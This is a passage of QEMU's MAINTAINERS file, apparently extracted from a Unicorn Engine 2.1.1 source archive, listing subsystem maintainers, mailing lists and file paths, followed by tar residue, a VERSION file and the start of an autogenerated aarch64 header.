<groug@kaod.org> R: Christian Schoenebeck <qemu_oss@crudebyte.com> S: Odd Fixes F: hw/9pfs/ X: hw/9pfs/xen-9p* F: fsdev/ F: docs/interop/virtfs-proxy-helper.rst F: tests/qtest/virtio-9p-test.c T: git https://github.com/gkurz/qemu.git 9p-next virtio-blk M: Stefan Hajnoczi <stefanha@redhat.com> L: qemu-block@nongnu.org S: Supported F: hw/block/virtio-blk.c F: hw/block/dataplane/* F: tests/qtest/virtio-blk-test.c T: git https://github.com/stefanha/qemu.git block virtio-ccw M: Cornelia Huck <cohuck@redhat.com> M: Halil Pasic <pasic@linux.ibm.com> S: Supported F: hw/s390x/virtio-ccw*.[hc] F: hw/s390x/vhost-vsock-ccw.c T: git https://github.com/cohuck/qemu.git s390-next T: git https://github.com/borntraeger/qemu.git s390-next L: qemu-s390x@nongnu.org virtiofs M: Dr. David Alan Gilbert <dgilbert@redhat.com> M: Stefan Hajnoczi <stefanha@redhat.com> S: Supported F: tools/virtiofsd/* F: hw/virtio/vhost-user-fs* F: include/hw/virtio/vhost-user-fs.h F: docs/interop/virtiofsd.rst virtio-input M: Gerd Hoffmann <kraxel@redhat.com> S: Maintained F: hw/input/vhost-user-input.c F: hw/input/virtio-input*.c F: include/hw/virtio/virtio-input.h F: contrib/vhost-user-input/* virtio-iommu M: Eric Auger <eric.auger@redhat.com> S: Maintained F: hw/virtio/virtio-iommu*.c F: include/hw/virtio/virtio-iommu.h virtio-serial M: Laurent Vivier <lvivier@redhat.com> R: Amit Shah <amit@kernel.org> S: Supported F: hw/char/virtio-serial-bus.c F: hw/char/virtio-console.c F: include/hw/virtio/virtio-serial.h F: tests/qtest/virtio-serial-test.c virtio-rng M: Laurent Vivier <lvivier@redhat.com> R: Amit Shah <amit@kernel.org> S: Supported F: hw/virtio/virtio-rng.c F: include/hw/virtio/virtio-rng.h F: include/sysemu/rng*.h F: backends/rng*.c F: tests/qtest/virtio-rng-test.c virtio-crypto M: Gonglei <arei.gonglei@huawei.com> S: Supported F: hw/virtio/virtio-crypto.c F: hw/virtio/virtio-crypto-pci.c F: include/hw/virtio/virtio-crypto.h nvme M: Keith Busch <keith.busch@intel.com> L: qemu-block@nongnu.org S: Supported F: hw/block/nvme* F: tests/qtest/nvme-test.c megasas M: Hannes Reinecke <hare@suse.com> L: qemu-block@nongnu.org S: Supported F: hw/scsi/megasas.c F: hw/scsi/mfi.h F: tests/qtest/megasas-test.c Network packet abstractions M: Dmitry Fleytman <dmitry.fleytman@gmail.com> S: Maintained F: include/net/eth.h F: net/eth.c F: hw/net/net_rx_pkt* F: hw/net/net_tx_pkt* Vmware M: Dmitry Fleytman <dmitry.fleytman@gmail.com> S: Maintained F: hw/net/vmxnet* F: hw/scsi/vmw_pvscsi* F: tests/qtest/vmxnet3-test.c Rocker M: Jiri Pirko <jiri@resnulli.us> S: Maintained F: hw/net/rocker/ F: tests/rocker/ F: docs/specs/rocker.txt NVDIMM M: Xiao Guangrong <xiaoguangrong.eric@gmail.com> S: Maintained F: hw/acpi/nvdimm.c F: hw/mem/nvdimm.c F: include/hw/mem/nvdimm.h F: docs/nvdimm.txt e1000x M: Dmitry Fleytman <dmitry.fleytman@gmail.com> S: Maintained F: hw/net/e1000x* e1000e M: Dmitry Fleytman <dmitry.fleytman@gmail.com> S: Maintained F: hw/net/e1000e* eepro100 M: Stefan Weil <sw@weilnetz.de> S: Maintained F: hw/net/eepro100.c tulip M: Sven Schnelle <svens@stackframe.org> S: Maintained F: hw/net/tulip.c F: hw/net/tulip.h Generic Loader M: Alistair Francis <alistair@alistair23.me> S: Maintained F: hw/core/generic-loader.c F: include/hw/core/generic-loader.h F: docs/generic-loader.txt Intel Hexadecimal Object File Loader M: Su Hang <suhang16@mails.ucas.ac.cn> S: Maintained F: tests/qtest/hexloader-test.c F: tests/data/hex-loader/test.hex CHRP NVRAM M: Thomas Huth <thuth@redhat.com> S: Maintained F: hw/nvram/chrp_nvram.c F: include/hw/nvram/chrp_nvram.h F: tests/qtest/prom-env-test.c VM Generation ID M: Ben Warren <ben@skyportsystems.com> S: Maintained F: hw/acpi/vmgenid.c F: include/hw/acpi/vmgenid.h F: docs/specs/vmgenid.txt F: tests/qtest/vmgenid-test.c F: stubs/vmgenid.c Unimplemented device M: Peter Maydell <peter.maydell@linaro.org> R: Philippe Mathieu-Daudé <f4bug@amsat.org> S: Maintained F: include/hw/misc/unimp.h F: hw/misc/unimp.c Standard VGA M: Gerd Hoffmann <kraxel@redhat.com> S: Maintained F: hw/display/vga* F: hw/display/bochs-display.c F: include/hw/display/vga.h F: include/hw/display/bochs-vbe.h ramfb M: Gerd Hoffmann <kraxel@redhat.com> S: Maintained F: hw/display/ramfb*.c F: include/hw/display/ramfb.h virtio-gpu M: Gerd Hoffmann <kraxel@redhat.com> S: Maintained F: hw/display/virtio-gpu* F: hw/display/virtio-vga.* F: include/hw/virtio/virtio-gpu.h vhost-user-blk M: Raphael Norwitz <raphael.norwitz@nutanix.com> S: Maintained F: contrib/vhost-user-blk/ F: contrib/vhost-user-scsi/ F: hw/block/vhost-user-blk.c F: hw/scsi/vhost-user-scsi.c F: hw/virtio/vhost-user-blk-pci.c F: hw/virtio/vhost-user-scsi-pci.c F: include/hw/virtio/vhost-user-blk.h F: include/hw/virtio/vhost-user-scsi.h vhost-user-gpu M: Marc-André Lureau <marcandre.lureau@redhat.com> M: Gerd Hoffmann <kraxel@redhat.com> S: Maintained F: docs/interop/vhost-user-gpu.rst F: contrib/vhost-user-gpu F: hw/display/vhost-user-* Cirrus VGA M: Gerd Hoffmann <kraxel@redhat.com> S: Odd Fixes W: https://www.kraxel.org/blog/2014/10/qemu-using-cirrus-considered-harmful/ F: hw/display/cirrus* EDID Generator M: Gerd Hoffmann <kraxel@redhat.com> S: Maintained F: hw/display/edid* F: include/hw/display/edid.h F: qemu-edid.c PIIX4 South Bridge (i82371AB) M: Hervé Poussineau <hpoussin@reactos.org> M: Philippe Mathieu-Daudé <f4bug@amsat.org> S: Maintained F: hw/isa/piix4.c F: include/hw/southbridge/piix.h Firmware configuration (fw_cfg) M: Philippe Mathieu-Daudé <philmd@redhat.com> R: Laszlo Ersek <lersek@redhat.com> R: Gerd Hoffmann <kraxel@redhat.com> S: Supported F: docs/specs/fw_cfg.txt F: hw/nvram/fw_cfg.c F: stubs/fw_cfg.c F: include/hw/nvram/fw_cfg.h F: include/standard-headers/linux/qemu_fw_cfg.h F: tests/qtest/libqos/fw_cfg.c F: tests/qtest/fw_cfg-test.c T: git https://github.com/philmd/qemu.git fw_cfg-next XIVE M: David Gibson <david@gibson.dropbear.id.au> M: Cédric Le Goater <clg@kaod.org> L: qemu-ppc@nongnu.org S: Supported F: hw/*/*xive* F: include/hw/*/*xive* F: docs/*/*xive* Subsystems ---------- Audio M: Gerd Hoffmann <kraxel@redhat.com> S: Maintained F: audio/ F: hw/audio/ F: include/hw/audio/ F: tests/qtest/ac97-test.c F: tests/qtest/es1370-test.c F: tests/qtest/intel-hda-test.c Block layer core M: Kevin Wolf <kwolf@redhat.com> M: Max Reitz <mreitz@redhat.com> L: qemu-block@nongnu.org S: Supported F: block* F: block/ F: hw/block/ F: include/block/ F: qemu-img* F: docs/interop/qemu-img.rst F: qemu-io* F: tests/qemu-iotests/ F: util/qemu-progress.c F: qobject/block-qdict.c F: tests/check-block-qdict.c T: git https://repo.or.cz/qemu/kevin.git block Block I/O path M: Stefan Hajnoczi <stefanha@redhat.com> M: Fam Zheng <fam@euphon.net> L: qemu-block@nongnu.org S: Supported F: util/async.c F: util/aio-*.c F: util/aio-*.h F: util/fdmon-*.c F: block/io.c F: migration/block* F: include/block/aio.h F: include/block/aio-wait.h F: scripts/qemugdb/aio.py T: git https://github.com/stefanha/qemu.git block Block SCSI subsystem M: Paolo Bonzini <pbonzini@redhat.com> R: Fam Zheng <fam@euphon.net> L: qemu-block@nongnu.org S: Supported F: include/scsi/* F: scsi/* Block Jobs M: John Snow <jsnow@redhat.com> L: qemu-block@nongnu.org S: Supported F: blockjob.c F: include/block/blockjob.h F: job.c F: job-qmp.c F: include/qemu/job.h F: block/backup.c F: block/commit.c F: block/stream.c F: block/mirror.c F: qapi/job.json T: git https://github.com/jnsnow/qemu.git jobs Block QAPI, monitor, command line M: Markus Armbruster <armbru@redhat.com> S: Supported F: blockdev.c F: blockdev-hmp-cmds.c F: block/qapi.c F: qapi/block*.json F: qapi/transaction.json T: git https://repo.or.cz/qemu/armbru.git block-next Dirty Bitmaps M: John Snow <jsnow@redhat.com> R: Vladimir Sementsov-Ogievskiy <vsementsov@virtuozzo.com> L: qemu-block@nongnu.org S: Supported F: include/qemu/hbitmap.h F: include/block/dirty-bitmap.h F: block/dirty-bitmap.c F: block/qcow2-bitmap.c F: migration/block-dirty-bitmap.c F: util/hbitmap.c F: tests/test-hbitmap.c F: docs/interop/bitmaps.rst T: git https://github.com/jnsnow/qemu.git bitmaps Character device backends M: Marc-André Lureau <marcandre.lureau@redhat.com> R: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: chardev/ F: include/chardev/ F: qapi/char.json Character Devices (Braille) M: Samuel Thibault <samuel.thibault@ens-lyon.org> S: Maintained F: chardev/baum.c Command line option argument parsing M: Markus Armbruster <armbru@redhat.com> S: Supported F: include/qemu/option.h F: tests/test-keyval.c F: tests/test-qemu-opts.c F: util/keyval.c F: util/qemu-option.c Coverity model M: Markus Armbruster <armbru@redhat.com> S: Supported F: scripts/coverity-model.c Coverity Scan integration M: Peter Maydell <peter.maydell@linaro.org> S: Maintained F: scripts/coverity-scan/ Device Tree M: Alistair Francis <alistair.francis@wdc.com> R: David Gibson <david@gibson.dropbear.id.au> S: Maintained F: device_tree.c F: include/sysemu/device_tree.h Dump S: Supported M: Marc-André Lureau <marcandre.lureau@redhat.com> F: dump/ F: hw/misc/vmcoreinfo.c F: include/hw/misc/vmcoreinfo.h F: include/qemu/win_dump_defs F: include/sysemu/dump-arch.h F: include/sysemu/dump.h F: qapi/dump.json F: scripts/dump-guest-memory.py F: stubs/dump.c Error reporting M: Markus Armbruster <armbru@redhat.com> S: Supported F: include/qapi/error.h F: include/qemu/error-report.h F: qapi/error.json F: util/error.c F: util/qemu-error.c F: scripts/coccinelle/err-bad-newline.cocci F: scripts/coccinelle/error-use-after-free.cocci F: scripts/coccinelle/error_propagate_null.cocci F: scripts/coccinelle/remove_local_err.cocci F: scripts/coccinelle/use-error_fatal.cocci GDB stub M: Alex Bennée <alex.bennee@linaro.org> R: Philippe Mathieu-Daudé <philmd@redhat.com> S: Maintained F: gdbstub* F: gdb-xml/ Memory API M: Paolo Bonzini <pbonzini@redhat.com> S: Supported F: include/exec/ioport.h F: ioport.c F: include/exec/memop.h F: include/exec/memory.h F: include/exec/ram_addr.h F: include/exec/ramblock.h F: memory.c F: include/exec/memory-internal.h F: exec.c F: scripts/coccinelle/memory-region-housekeeping.cocci SPICE M: Gerd Hoffmann <kraxel@redhat.com> S: Supported F: include/ui/qemu-spice.h F: include/ui/spice-display.h F: ui/spice-*.c F: audio/spiceaudio.c F: hw/display/qxl* F: qapi/ui.json F: docs/spice-port-fqdn.txt Graphics M: Gerd Hoffmann <kraxel@redhat.com> S: Odd Fixes F: ui/ F: include/ui/ F: qapi/ui.json F: util/drm.c Cocoa graphics M: Peter Maydell <peter.maydell@linaro.org> S: Odd Fixes F: ui/cocoa.m Main loop M: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: cpus.c F: include/qemu/main-loop.h F: include/sysemu/runstate.h F: util/main-loop.c F: util/qemu-timer.c F: softmmu/vl.c F: softmmu/main.c F: qapi/run-state.json Human Monitor (HMP) M: Dr. David Alan Gilbert <dgilbert@redhat.com> S: Maintained F: monitor/monitor-internal.h F: monitor/misc.c F: monitor/monitor.c F: monitor/hmp* F: hmp.h F: hmp-commands*.hx F: include/monitor/hmp-target.h F: tests/qtest/test-hmp.c F: include/qemu/qemu-print.h F: util/qemu-print.c Network device backends M: Jason Wang <jasowang@redhat.com> S: Maintained F: net/ F: include/net/ F: qemu-bridge-helper.c T: git https://github.com/jasowang/qemu.git net F: qapi/net.json Netmap network backend M: Luigi Rizzo <rizzo@iet.unipi.it> M: Giuseppe Lettieri <g.lettieri@iet.unipi.it> M: Vincenzo Maffione <v.maffione@gmail.com> W: http://info.iet.unipi.it/~luigi/netmap/ S: Maintained F: net/netmap.c Host Memory Backends M: Eduardo Habkost <ehabkost@redhat.com> M: Igor Mammedov <imammedo@redhat.com> S: Maintained F: backends/hostmem*.c F: include/sysemu/hostmem.h T: git https://github.com/ehabkost/qemu.git machine-next Cryptodev Backends M: Gonglei <arei.gonglei@huawei.com> S: Maintained F: include/sysemu/cryptodev*.h F: backends/cryptodev*.c Python scripts M: Eduardo Habkost <ehabkost@redhat.com> M: Cleber Rosa <crosa@redhat.com> S: Odd fixes F: python/qemu/*py F: scripts/*.py F: tests/*.py Benchmark util M: Vladimir Sementsov-Ogievskiy <vsementsov@virtuozzo.com> S: Maintained F: scripts/simplebench/ QAPI M: Markus Armbruster <armbru@redhat.com> M: Michael Roth <mdroth@linux.vnet.ibm.com> S: Supported F: qapi/ X: qapi/*.json F: include/qapi/ X: include/qapi/qmp/ F: include/qapi/qmp/dispatch.h F: tests/qapi-schema/ F: tests/test-*-visitor.c F: tests/test-qapi-*.c F: tests/test-qmp-*.c F: tests/test-visitor-serialization.c F: scripts/qapi-gen.py F: scripts/qapi/* F: docs/devel/qapi* T: git https://repo.or.cz/qemu/armbru.git qapi-next QAPI Schema M: Eric Blake <eblake@redhat.com> M: Markus Armbruster <armbru@redhat.com> S: Supported F: qapi/*.json T: git https://repo.or.cz/qemu/armbru.git qapi-next QObject M: Markus Armbruster <armbru@redhat.com> S: Supported F: qobject/ F: include/qapi/qmp/ X: include/qapi/qmp/dispatch.h F: scripts/coccinelle/qobject.cocci F: tests/check-qdict.c F: tests/check-qjson.c F: tests/check-qlist.c F: tests/check-qlit.c F: tests/check-qnull.c F: tests/check-qnum.c F: tests/check-qobject.c F: tests/check-qstring.c F: tests/data/qobject/qdict.txt T: git https://repo.or.cz/qemu/armbru.git qapi-next QEMU Guest Agent M: Michael Roth <mdroth@linux.vnet.ibm.com> S: Maintained F: qga/ F: docs/interop/qemu-ga.rst F: scripts/qemu-guest-agent/ F: tests/test-qga.c F: docs/interop/qemu-ga-ref.texi T: git https://github.com/mdroth/qemu.git qga QOM M: Paolo Bonzini <pbonzini@redhat.com> R: Daniel P. Berrange <berrange@redhat.com> R: Eduardo Habkost <ehabkost@redhat.com> S: Supported F: docs/qdev-device-use.txt F: hw/core/qdev* F: include/hw/qdev* F: include/monitor/qdev.h F: include/qom/ F: qapi/qom.json F: qapi/qdev.json F: qdev-monitor.c F: qom/ F: tests/check-qom-interface.c F: tests/check-qom-proplist.c F: tests/test-qdev-global-props.c QMP M: Markus Armbruster <armbru@redhat.com> S: Supported F: monitor/monitor-internal.h F: monitor/qmp* F: monitor/misc.c F: monitor/monitor.c F: qapi/error.json F: docs/devel/*qmp-* F: docs/interop/*qmp-* F: scripts/qmp/ F: tests/qtest/qmp-test.c F: tests/qtest/qmp-cmd-test.c T: git https://repo.or.cz/qemu/armbru.git qapi-next qtest M: Thomas Huth <thuth@redhat.com> M: Laurent Vivier <lvivier@redhat.com> R: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: qtest.c F: accel/qtest.c F: tests/qtest/ Device Fuzzing M: Alexander Bulekov <alxndr@bu.edu> R: Paolo Bonzini <pbonzini@redhat.com> R: Bandan Das <bsd@redhat.com> R: Stefan Hajnoczi <stefanha@redhat.com> S: Maintained F: tests/qtest/fuzz/ Register API M: Alistair Francis <alistair@alistair23.me> S: Maintained F: hw/core/register.c F: include/hw/register.h F: include/hw/registerfields.h SLIRP M: Samuel Thibault <samuel.thibault@ens-lyon.org> S: Maintained F: slirp/ F: net/slirp.c F: include/net/slirp.h T: git https://people.debian.org/~sthibault/qemu.git slirp Stubs M: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: stubs/ Tracing M: Stefan Hajnoczi <stefanha@redhat.com> S: Maintained F: trace/ F: trace-events F: docs/qemu-option-trace.rst.inc F: scripts/tracetool.py F: scripts/tracetool/ F: scripts/qemu-trace-stap* F: docs/interop/qemu-trace-stap.rst F: docs/devel/tracing.txt T: git https://github.com/stefanha/qemu.git tracing TPM M: Stefan Berger <stefanb@linux.ibm.com> S: Maintained F: tpm.c F: stubs/tpm.c F: hw/tpm/* F: include/hw/acpi/tpm.h F: include/sysemu/tpm* F: qapi/tpm.json F: backends/tpm.c F: tests/qtest/*tpm* T: git https://github.com/stefanberger/qemu-tpm.git tpm-next Checkpatch S: Odd Fixes F: scripts/checkpatch.pl Migration M: Juan Quintela <quintela@redhat.com> M: Dr. David Alan Gilbert <dgilbert@redhat.com> S: Maintained F: hw/core/vmstate-if.c F: include/hw/vmstate-if.h F: include/migration/ F: migration/ F: scripts/vmstate-static-checker.py F: tests/vmstate-static-checker-data/ F: tests/qtest/migration-test.c F: docs/devel/migration.rst F: qapi/migration.json D-Bus M: Marc-André Lureau <marcandre.lureau@redhat.com> S: Maintained F: backends/dbus-vmstate.c F: tests/dbus-vmstate* F: util/dbus.c F: include/qemu/dbus.h F: docs/interop/dbus.rst F: docs/interop/dbus-vmstate.rst Seccomp M: Eduardo Otubo <otubo@redhat.com> S: Supported F: qemu-seccomp.c F: include/sysemu/seccomp.h Cryptography M: Daniel P. Berrange <berrange@redhat.com> S: Maintained F: crypto/ F: include/crypto/ F: tests/test-crypto-* F: tests/benchmark-crypto-* F: tests/crypto-tls-* F: tests/pkix_asn1_tab.c F: qemu.sasl Coroutines M: Stefan Hajnoczi <stefanha@redhat.com> M: Kevin Wolf <kwolf@redhat.com> S: Maintained F: util/*coroutine* F: include/qemu/coroutine* F: tests/test-coroutine.c Buffers M: Daniel P. Berrange <berrange@redhat.com> S: Odd fixes F: util/buffer.c F: include/qemu/buffer.h I/O Channels M: Daniel P. Berrange <berrange@redhat.com> S: Maintained F: io/ F: include/io/ F: tests/test-io-* User authorization M: Daniel P. Berrange <berrange@redhat.com> S: Maintained F: authz/ F: qapi/authz.json F: include/authz/ F: tests/test-authz-* Sockets M: Daniel P. Berrange <berrange@redhat.com> M: Gerd Hoffmann <kraxel@redhat.com> S: Maintained F: include/qemu/sockets.h F: util/qemu-sockets.c F: qapi/sockets.json File monitor M: Daniel P. Berrange <berrange@redhat.com> S: Odd fixes F: util/filemonitor*.c F: include/qemu/filemonitor.h F: tests/test-util-filemonitor.c Throttling infrastructure M: Alberto Garcia <berto@igalia.com> S: Supported F: block/throttle-groups.c F: include/block/throttle-groups.h F: include/qemu/throttle*.h F: util/throttle.c F: docs/throttle.txt F: tests/test-throttle.c L: qemu-block@nongnu.org UUID M: Fam Zheng <fam@euphon.net> S: Supported F: util/uuid.c F: include/qemu/uuid.h F: tests/test-uuid.c COLO Framework M: zhanghailiang <zhang.zhanghailiang@huawei.com> S: Maintained F: migration/colo* F: include/migration/colo.h F: include/migration/failover.h F: docs/COLO-FT.txt COLO Proxy M: Zhang Chen <chen.zhang@intel.com> M: Li Zhijian <lizhijian@cn.fujitsu.com> S: Supported F: docs/colo-proxy.txt F: net/colo* F: net/filter-rewriter.c F: net/filter-mirror.c Record/replay M: Pavel Dovgalyuk <pavel.dovgaluk@ispras.ru> R: Paolo Bonzini <pbonzini@redhat.com> W: https://wiki.qemu.org/Features/record-replay S: Supported F: replay/* F: block/blkreplay.c F: net/filter-replay.c F: include/sysemu/replay.h F: docs/replay.txt F: stubs/replay.c IOVA Tree M: Peter Xu <peterx@redhat.com> S: Maintained F: include/qemu/iova-tree.h F: util/iova-tree.c elf2dmp M: Viktor Prutyanov <viktor.prutyanov@phystech.edu> S: Maintained F: contrib/elf2dmp/ I2C and SMBus M: Corey Minyard <cminyard@mvista.com> S: Maintained F: hw/i2c/core.c F: hw/i2c/smbus_slave.c F: hw/i2c/smbus_master.c F: hw/i2c/smbus_eeprom.c F: include/hw/i2c/i2c.h F: include/hw/i2c/smbus_master.h F: include/hw/i2c/smbus_slave.h F: include/hw/i2c/smbus_eeprom.h EDK2 Firmware M: Laszlo Ersek <lersek@redhat.com> M: Philippe Mathieu-Daudé <philmd@redhat.com> S: Supported F: pc-bios/descriptors/??-edk2-*.json F: pc-bios/edk2-* F: roms/Makefile.edk2 F: roms/edk2 F: roms/edk2-* F: tests/data/uefi-boot-images/ F: tests/uefi-test-tools/ F: .gitlab-ci-edk2.yml F: .gitlab-ci.d/edk2/ Usermode Emulation ------------------ Overall usermode emulation M: Riku Voipio <riku.voipio@iki.fi> S: Maintained F: thunk.c F: accel/tcg/user-exec*.c BSD user S: Orphan F: bsd-user/ F: default-configs/*-bsd-user.mak Linux user M: Riku Voipio <riku.voipio@iki.fi> R: Laurent Vivier <laurent@vivier.eu> S: Maintained F: linux-user/ F: default-configs/*-linux-user.mak F: scripts/qemu-binfmt-conf.sh F: scripts/update-syscalltbl.sh F: scripts/update-mips-syscall-args.sh F: scripts/gensyscalls.sh Tiny Code Generator (TCG) ------------------------- Common TCG code M: Richard Henderson <rth@twiddle.net> S: Maintained F: tcg/ F: include/tcg/ TCG Plugins M: Alex Bennée <alex.bennee@linaro.org> S: Maintained F: docs/devel/tcg-plugins.rst F: plugins/ F: tests/plugin AArch64 TCG target M: Richard Henderson <richard.henderson@linaro.org> S: Maintained L: qemu-arm@nongnu.org F: tcg/aarch64/ F: disas/arm-a64.cc F: disas/libvixl/ ARM TCG target M: Andrzej Zaborowski <balrogg@gmail.com> S: Maintained L: qemu-arm@nongnu.org F: tcg/arm/ F: disas/arm.c i386 TCG target M: Richard Henderson <rth@twiddle.net> S: Maintained F: tcg/i386/ F: disas/i386.c MIPS TCG target M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> R: Aurelien Jarno <aurelien@aurel32.net> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Maintained F: tcg/mips/ PPC TCG target M: Richard Henderson <rth@twiddle.net> S: Odd Fixes F: tcg/ppc/ F: disas/ppc.c RISC-V TCG target M: Palmer Dabbelt <palmer@dabbelt.com> M: Alistair Francis <Alistair.Francis@wdc.com> L: qemu-riscv@nongnu.org S: Maintained F: tcg/riscv/ F: disas/riscv.c S390 TCG target M: Richard Henderson <rth@twiddle.net> S: Maintained F: tcg/s390/ F: disas/s390.c L: qemu-s390x@nongnu.org SPARC TCG target S: Odd Fixes F: tcg/sparc/ F: disas/sparc.c TCI TCG target M: Stefan Weil <sw@weilnetz.de> S: Maintained F: tcg/tci/ F: tcg/tci.c F: disas/tci.c Block drivers ------------- VMDK M: Fam Zheng <fam@euphon.net> L: qemu-block@nongnu.org S: Supported F: block/vmdk.c RBD M: Jason Dillaman <dillaman@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/rbd.c Sheepdog M: Liu Yuan <namei.unix@gmail.com> L: qemu-block@nongnu.org L: sheepdog@lists.wpkg.org S: Odd Fixes F: block/sheepdog.c VHDX M: Jeff Cody <codyprime@gmail.com> L: qemu-block@nongnu.org S: Supported F: block/vhdx* VDI M: Stefan Weil <sw@weilnetz.de> L: qemu-block@nongnu.org S: Maintained F: block/vdi.c iSCSI M: Ronnie Sahlberg <ronniesahlberg@gmail.com> M: Paolo Bonzini <pbonzini@redhat.com> M: Peter Lieven <pl@kamp.de> L: qemu-block@nongnu.org S: Odd Fixes F: block/iscsi.c F: block/iscsi-opts.c Network Block Device (NBD) M: Eric Blake <eblake@redhat.com> L: qemu-block@nongnu.org S: Maintained F: block/nbd* F: nbd/ F: include/block/nbd* F: qemu-nbd.* F: blockdev-nbd.c F: docs/interop/nbd.txt F: docs/interop/qemu-nbd.rst T: git https://repo.or.cz/qemu/ericb.git nbd NFS M: Peter Lieven <pl@kamp.de> L: qemu-block@nongnu.org S: Maintained F: block/nfs.c SSH M: Richard W.M. Jones <rjones@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/ssh.c CURL L: qemu-block@nongnu.org S: Odd Fixes F: block/curl.c GLUSTER L: qemu-block@nongnu.org L: integration@gluster.org S: Odd Fixes F: block/gluster.c Null Block Driver M: Fam Zheng <fam@euphon.net> L: qemu-block@nongnu.org S: Supported F: block/null.c NVMe Block Driver M: Fam Zheng <fam@euphon.net> L: qemu-block@nongnu.org S: Supported F: block/nvme* Bootdevice M: Gonglei <arei.gonglei@huawei.com> S: Maintained F: bootdevice.c Quorum M: Alberto Garcia <berto@igalia.com> S: Supported F: block/quorum.c L: qemu-block@nongnu.org blklogwrites M: Ari Sundholm <ari@tuxera.com> L: qemu-block@nongnu.org S: Supported F: block/blklogwrites.c blkverify M: Stefan Hajnoczi <stefanha@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/blkverify.c bochs M: Stefan Hajnoczi <stefanha@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/bochs.c cloop M: Stefan Hajnoczi <stefanha@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/cloop.c dmg M: Stefan Hajnoczi <stefanha@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/dmg.c parallels M: Stefan Hajnoczi <stefanha@redhat.com> M: Denis V. Lunev <den@openvz.org> L: qemu-block@nongnu.org S: Supported F: block/parallels.c F: docs/interop/parallels.txt qed M: Stefan Hajnoczi <stefanha@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/qed.c raw M: Kevin Wolf <kwolf@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/linux-aio.c F: include/block/raw-aio.h F: block/raw-format.c F: block/file-posix.c F: block/file-win32.c F: block/win32-aio.c Linux io_uring M: Aarushi Mehta <mehta.aaru20@gmail.com> M: Julia Suvorova <jusual@redhat.com> M: Stefan Hajnoczi <stefanha@redhat.com> L: qemu-block@nongnu.org S: Maintained F: block/io_uring.c F: stubs/io_uring.c qcow2 M: Kevin Wolf <kwolf@redhat.com> M: Max Reitz <mreitz@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/qcow2* F: docs/interop/qcow2.txt qcow M: Kevin Wolf <kwolf@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/qcow.c blkdebug M: Kevin Wolf <kwolf@redhat.com> M: Max Reitz <mreitz@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/blkdebug.c vpc M: Kevin Wolf <kwolf@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/vpc.c vvfat M: Kevin Wolf <kwolf@redhat.com> L: qemu-block@nongnu.org S: Supported F: block/vvfat.c Image format fuzzer M: Stefan Hajnoczi <stefanha@redhat.com> L: qemu-block@nongnu.org S: Supported F: tests/image-fuzzer/ Replication M: Wen Congyang <wencongyang2@huawei.com> M: Xie Changlong <xiechanglong.d@gmail.com> S: Supported F: replication* F: block/replication.c F: tests/test-replication.c F: docs/block-replication.txt PVRDMA M: Yuval Shaia <yuval.shaia.ml@gmail.com> M: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> S: Maintained F: hw/rdma/* F: hw/rdma/vmw/* F: docs/pvrdma.txt F: contrib/rdmacm-mux/* F: qapi/rdma.json Semihosting M: Alex Bennée <alex.bennee@linaro.org> S: Maintained F: hw/semihosting/ F: include/hw/semihosting/ Build and test automation ------------------------- Build and test automation M: Alex Bennée <alex.bennee@linaro.org> M: Fam Zheng <fam@euphon.net> R: Philippe Mathieu-Daudé <philmd@redhat.com> S: Maintained F: .github/lockdown.yml F: .travis.yml F: scripts/travis/ F: .shippable.yml F: tests/docker/ F: tests/vm/ F: scripts/archive-source.sh W: https://travis-ci.org/qemu/qemu W: https://app.shippable.com/github/qemu/qemu W: http://patchew.org/QEMU/ FreeBSD Hosted Continuous Integration M: Ed Maste <emaste@freebsd.org> M: Li-Wen Hsu <lwhsu@freebsd.org> S: Maintained F: .cirrus.yml W: https://cirrus-ci.com/github/qemu/qemu GitLab Continuous Integration M: Thomas Huth <thuth@redhat.com> S: Maintained F: .gitlab-ci.yml Guest Test Compilation Support M: Alex Bennée <alex.bennee@linaro.org> R: Philippe Mathieu-Daudé <f4bug@amsat.org> S: Maintained F: tests/tcg/Makefile F: tests/tcg/Makefile.include Documentation ------------- Build system architecture M: Daniel P. Berrange <berrange@redhat.com> S: Odd Fixes F: docs/devel/build-system.txt GIT Data Mining Config M: Alex Bennée <alex.bennee@linaro.org> S: Odd Fixes F: gitdm.config F: contrib/gitdm/* Incompatible changes R: libvir-list@redhat.com F: docs/system/deprecated.rst Build System ------------ GIT submodules M: Daniel P. Berrange <berrange@redhat.com> S: Odd Fixes F: scripts/git-submodule.sh UI translations M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> F: po/*.po Sphinx documentation configuration and build machinery M: Peter Maydell <peter.maydell@linaro.org> S: Maintained F: docs/conf.py F: docs/*/conf.py ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/VERSION��������������������������������������������������������������������������0000664�0000000�0000000�00000000006�14675241067�0015217�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������5.0.1 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/aarch64.h������������������������������������������������������������������������0000664�0000000�0000000�00000517250�14675241067�0015566�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_aarch64_H #define 